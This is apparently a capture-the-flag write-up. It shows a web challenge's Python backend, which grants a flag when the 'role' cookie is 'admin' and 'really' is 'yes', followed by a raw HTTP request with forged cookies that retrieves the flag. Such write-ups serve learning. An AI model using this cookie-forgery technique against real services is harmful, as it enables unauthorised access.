Rating:
Flag: `ENO{R3Qu3sts_4r3_s0m3T1m3s_we1rd_dont_get_confused}`
Going to the ip provided we get this
```
Usage: Look at the code ;-)
Overwriting cookies with default value! This must be secure!
Prepared request cookies are: [('role', 'guest')]
Sending request...
Request cookies are: [('role', 'guest')]
Response is: Guest: Nope
```
And looking at the backend we see this
```
def whoami():
role = request.cookies.get('role','guest')
really = request.cookies.get('really', 'no')
if role == 'admin':
if really == 'yes':
resp = 'Admin: ' + os.environ['FLAG']
else:
resp = 'Guest: Nope'
else:
resp = 'Guest: Nope'
return Response(resp, mimetype='text/plain')
```
So we have to provide a cookie with `role=admin` and `really=yes` and it will give us the flag
```
GET / HTTP/1.1
Host: 52.59.124.14:10014
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: role=admin;really=yes
Upgrade-Insecure-Requests: 1
```